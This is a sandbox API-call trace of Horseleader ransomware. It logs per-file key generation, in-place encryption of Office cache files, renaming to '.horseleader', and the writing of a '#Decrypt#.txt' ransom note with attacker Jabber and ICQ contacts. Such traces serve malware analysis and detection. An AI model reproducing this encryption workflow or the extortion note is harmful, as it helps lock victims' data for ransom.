Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab.horseleader") returned 91 [0208.960] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveLR.cab.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovelr.cab.horseleader")) returned 1 [0208.960] GetProcessHeap () returned 0x780000 [0208.960] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0208.961] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbd907a00, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbd907a00, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee3b15e0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x264400, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="GrooveMUI.msi", cAlternateFileName="GROOVE~1.MSI")) returned 1 [0208.961] lstrcmpiW (lpString1="GrooveMUI.msi", lpString2="Windows") returned -1 [0208.961] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 80 [0208.961] StrStrIW (lpFirst="GrooveMUI.msi", lpSrch=".horseleader") returned 0x0 [0208.961] lstrcmpW (lpString1="GrooveMUI.msi", lpString2="#Decrypt#.txt") returned 1 [0208.961] lstrcmpW (lpString1="GrooveMUI.msi", lpString2="_uninstalling_.png") returned 1 [0208.961] lstrlenW (lpString=".testttjffg") returned 11 [0208.961] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi", lpSrch=".testttjffg") returned 0x0 
[0208.961] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0208.961] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0208.961] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0208.962] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi") returned 80 [0208.962] StrStrW (lpFirst="GrooveMUI.msi", lpSrch=".txt") returned 0x0 [0208.962] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=2507776) returned 1 [0208.962] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0208.962] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0209.052] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0209.052] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0209.052] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x12fa00, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0209.052] ReadFile (in: hFile=0x21c, 
lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0209.343] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0209.343] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0209.344] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x25f400, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0209.344] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0209.380] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xffffb000, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0209.380] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5000, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5000, lpOverlapped=0x0) returned 1 [0209.381] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0209.381] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0209.381] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) 
returned 1 [0209.381] CloseHandle (hObject=0x21c) returned 1 [0209.381] GetProcessHeap () returned 0x780000 [0209.381] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0209.381] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi.horseleader") returned 92 [0209.381] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.msi.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.msi.horseleader")) returned 1 [0209.382] GetProcessHeap () returned 0x780000 [0209.382] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0209.382] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee38cbf0, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x391, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="GrooveMUI.xml", cAlternateFileName="GROOVE~1.XML")) returned 1 [0209.382] lstrcmpiW (lpString1="GrooveMUI.xml", lpString2="Windows") returned -1 [0209.383] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 80 [0209.383] StrStrIW (lpFirst="GrooveMUI.xml", lpSrch=".horseleader") returned 0x0 [0209.383] lstrcmpW (lpString1="GrooveMUI.xml", lpString2="#Decrypt#.txt") 
returned 1 [0209.383] lstrcmpW (lpString1="GrooveMUI.xml", lpString2="_uninstalling_.png") returned 1 [0209.383] lstrlenW (lpString=".testttjffg") returned 11 [0209.383] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml", lpSrch=".testttjffg") returned 0x0 [0209.383] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0209.383] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0209.383] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0209.383] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml") returned 80 [0209.383] StrStrW (lpFirst="GrooveMUI.xml", lpSrch=".txt") returned 0x0 [0209.383] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=913) returned 1 [0209.384] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x391, lpOverlapped=0x0) returned 1 [0209.387] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffffc6f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0209.387] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x391, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x391, lpOverlapped=0x0) returned 1 [0209.387] SetFilePointerEx (in: 
hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0209.387] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0209.387] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0209.387] CloseHandle (hObject=0x21c) returned 1 [0209.388] GetProcessHeap () returned 0x780000 [0209.388] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0209.388] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.horseleader") returned 92 [0209.388] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\GrooveMUI.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\groovemui.xml.horseleader")) returned 1 [0209.401] GetProcessHeap () returned 0x780000 [0209.401] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0209.401] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, 
nFileSizeLow=0x5ac, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 1 [0209.401] lstrcmpiW (lpString1="Setup.xml", lpString2="Windows") returned -1 [0209.401] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0209.401] StrStrIW (lpFirst="Setup.xml", lpSrch=".horseleader") returned 0x0 [0209.401] lstrcmpW (lpString1="Setup.xml", lpString2="#Decrypt#.txt") returned 1 [0209.401] lstrcmpW (lpString1="Setup.xml", lpString2="_uninstalling_.png") returned 1 [0209.401] lstrlenW (lpString=".testttjffg") returned 11 [0209.401] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml", lpSrch=".testttjffg") returned 0x0 [0209.401] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0209.401] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, pdwDataLen=0x32af044*=0x80) returned 1 [0209.401] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x21c [0209.402] lstrlenW (lpString="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml") returned 76 [0209.402] StrStrW (lpFirst="Setup.xml", lpSrch=".txt") returned 0x0 [0209.402] GetFileSizeEx (in: hFile=0x21c, lpFileSize=0x32af048 | out: lpFileSize=0x32af048*=1452) returned 1 [0209.402] ReadFile (in: hFile=0x21c, lpBuffer=0x32a9f88, nNumberOfBytesToRead=0x5000, lpNumberOfBytesRead=0x32af06c, lpOverlapped=0x0 | out: 
lpBuffer=0x32a9f88*, lpNumberOfBytesRead=0x32af06c*=0x5ac, lpOverlapped=0x0) returned 1 [0209.405] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0xfffffa54, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0209.405] WriteFile (in: hFile=0x21c, lpBuffer=0x32a9f88*, nNumberOfBytesToWrite=0x5ac, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32a9f88*, lpNumberOfBytesWritten=0x32af06c*=0x5ac, lpOverlapped=0x0) returned 1 [0209.405] SetFilePointerEx (in: hFile=0x21c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0209.405] WriteFile (in: hFile=0x21c, lpBuffer=0x32af040*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32af040*, lpNumberOfBytesWritten=0x32af06c*=0x4, lpOverlapped=0x0) returned 1 [0209.405] WriteFile (in: hFile=0x21c, lpBuffer=0x32aef88*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x32af06c, lpOverlapped=0x0 | out: lpBuffer=0x32aef88*, lpNumberOfBytesWritten=0x32af06c*=0x80, lpOverlapped=0x0) returned 1 [0209.405] CloseHandle (hObject=0x21c) returned 1 [0209.406] GetProcessHeap () returned 0x780000 [0209.406] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x7d9fd8 [0209.406] wnsprintfW (in: pszDest=0x7d9fd8, cchDest=1024, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.horseleader") returned 88 [0209.406] MoveFileW (lpExistingFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml"), lpNewFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\Setup.xml.horseleader" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\setup.xml.horseleader")) returned 1 [0209.407] GetProcessHeap () returned 0x780000 
[0209.407] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x7d9fd8 | out: hHeap=0x780000) returned 1 [0209.407] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xbec1a700, ftCreationTime.dwHighDateTime=0x1cad04a, ftLastAccessTime.dwLowDateTime=0xbec1a700, ftLastAccessTime.dwHighDateTime=0x1cad04a, ftLastWriteTime.dwLowDateTime=0xee803530, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x5ac, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="Setup.xml", cAlternateFileName="")) returned 0 [0209.407] FindClose (in: hFindFile=0x7c67a0 | out: hFindFile=0x7c67a0) returned 1 [0209.407] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\#Decrypt#.txt") returned 80 [0209.407] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-00BA-0409-1000-0000000FF1CE}-C\\#Decrypt#.txt" (normalized: "c:\\msocache\\all users\\{90140000-00ba-0409-1000-0000000ff1ce}-c\\#decrypt#.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1cc [0209.407] lstrlenA (lpString="All your files have been ENCRYPTED!!!\r\nWrite to our ICQ @Horseleader\r\nOr contact us via jabber - horseleader@xmpp.jp\r\nJabber client installation instructions:\r\nDownload the jabber (Pidgin) client from https://pidgin.im/download/windows/ \r\n\r\nAfter installation, the Pidgin client will prompt you to create a new account. 
\r\nClick - Add\r\nIn the -Protocol field, select XMPP \r\nIn -Username - come up with any name \r\nIn the field -domain - enter any jabber-server, there are a lot of them, for example - exploit.im \r\nCreate a password\r\nAt the bottom, put a tick -Create account \r\nClick add \r\nIf you selected -domain - exploit.im, then a new window should appear in which you will need to re-enter your data: \r\nUser \r\npassword \r\nYou will need to follow the link to the captcha (there you will see the characters that you need to enter in the field below) \r\nIf you don't understand our Pidgin client installation instructions, you can find many installation tutorials on youtube - https://www.youtube.com/results?search_query=pidgin+jabber+install \r\nIf you have not received a response from us then we may have technical problems and please write to us using Jaber here bigbosshorse@xmpp.jp or on icq \r\nAttention!\r\nDo not rename encrypted files. \r\nDo not try to decrypt your data using third party software, it may cause permanent data loss. \r\nDecryption of your files with the help of third parties may cause increased price (they add their fee to our) or you can become a victim of a scam. 
\r\ntell your unique ID\r\n") returned 1508 [0209.408] WriteFile (in: hFile=0x1cc, lpBuffer=0xb41ca0*, nNumberOfBytesToWrite=0x5e4, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0xb41ca0*, lpNumberOfBytesWritten=0x32af088*=0x5e4, lpOverlapped=0x0) returned 1 [0209.409] lstrlenA (lpString="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") returned 1368 [0209.409] WriteFile (in: hFile=0x1cc, lpBuffer=0x7d1740*, nNumberOfBytesToWrite=0x558, lpNumberOfBytesWritten=0x32af088, lpOverlapped=0x0 | out: lpBuffer=0x7d1740*, lpNumberOfBytesWritten=0x32af088*=0x558, lpOverlapped=0x0) returned 1 [0209.409] CloseHandle (hObject=0x1cc) returned 1 [0209.410] GetProcessHeap () returned 0x780000 [0209.410] HeapFree (in: hHeap=0x780000, dwFlags=0x0, lpMem=0x79a620 | out: hHeap=0x780000) returned 1 [0209.410] FindNextFileW (in: hFindFile=0x7c6720, lpFindFileData=0x32af308 | out: lpFindFileData=0x32af308*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8729610, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8729610, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x5b02f5ca, dwReserved1=0x2fe4dac2, cFileName="{90140000-0115-0409-1000-0000000FF1CE}-C", cAlternateFileName="{90140~1")) returned 1 [0209.410] lstrcmpiW (lpString1="{90140000-0115-0409-1000-0000000FF1CE}-C", lpString2="Windows") returned -1 [0209.410] wnsprintfW (in: pszDest=0x7c8598, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C") returned 66 [0209.410] lstrcmpW (lpString1="{90140000-0115-0409-1000-0000000FF1CE}-C", lpString2=".") returned 1 [0209.410] lstrcmpW (lpString1="{90140000-0115-0409-1000-0000000FF1CE}-C", lpString2="..") returned 1 [0209.410] lstrcmpW (lpString1="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C", 
lpString2="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop") returned -1 [0209.410] GetProcessHeap () returned 0x780000 [0209.410] RtlAllocateHeap (HeapHandle=0x780000, Flags=0x8, Size=0x840) returned 0x79a620 [0209.410] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*") returned 68 [0209.410] FindFirstFileW (in: lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\*", lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8729610, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8729610, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName=".", cAlternateFileName="")) returned 0x7c67a0 [0209.413] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0209.413] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\.") returned 68 [0209.413] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0209.413] StrStrIW (lpFirst=".", lpSrch=".horseleader") returned 0x0 [0209.413] lstrcmpW (lpString1=".", lpString2="#Decrypt#.txt") returned 1 [0209.413] lstrcmpW (lpString1=".", lpString2="_uninstalling_.png") returned -1 [0209.413] lstrlenW (lpString=".testttjffg") returned 11 [0209.413] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\.", lpSrch=".testttjffg") returned 0x0 [0209.413] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0209.413] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: pbData=0x32aef88*, 
pdwDataLen=0x32af044*=0x80) returned 1 [0209.413] CreateFileW (lpFileName="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\." (normalized: "c:\\msocache\\all users\\{90140000-0115-0409-1000-0000000ff1ce}-c\\."), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0209.413] FindNextFileW (in: hFindFile=0x7c67a0, lpFindFileData=0x32af090 | out: lpFindFileData=0x32af090*(dwFileAttributes=0x2011, ftCreationTime.dwLowDateTime=0xe7b68970, ftCreationTime.dwHighDateTime=0x1d301be, ftLastAccessTime.dwLowDateTime=0xe8729610, ftLastAccessTime.dwHighDateTime=0x1d301be, ftLastWriteTime.dwLowDateTime=0xe8729610, ftLastWriteTime.dwHighDateTime=0x1d301be, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0xdded3805, dwReserved1=0xda7b4a6d, cFileName="..", cAlternateFileName="")) returned 1 [0209.414] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0209.414] wnsprintfW (in: pszDest=0x79a620, cchDest=1024, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\..") returned 69 [0209.414] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0209.414] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0209.414] StrStrIW (lpFirst="..", lpSrch=".horseleader") returned 0x0 [0209.414] lstrcmpW (lpString1="..", lpString2="#Decrypt#.txt") returned 1 [0209.414] lstrcmpW (lpString1="..", lpString2="_uninstalling_.png") returned -1 [0209.414] lstrlenW (lpString=".testttjffg") returned 11 [0209.414] StrStrW (lpFirst="\\\\?\\C:\\MSOCache\\All Users\\{90140000-0115-0409-1000-0000000FF1CE}-C\\..", lpSrch=".testttjffg") returned 0x0 [0209.414] CryptGenRandom (in: hProv=0x7c6248, dwLen=0x24, pbBuffer=0x32aef88 | out: pbBuffer=0x32aef88) returned 1 [0209.414] CryptEncrypt (in: hKey=0x7c65a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x32aef88*, pdwDataLen=0x32af044*=0x24, dwBufLen=0x80 | out: 
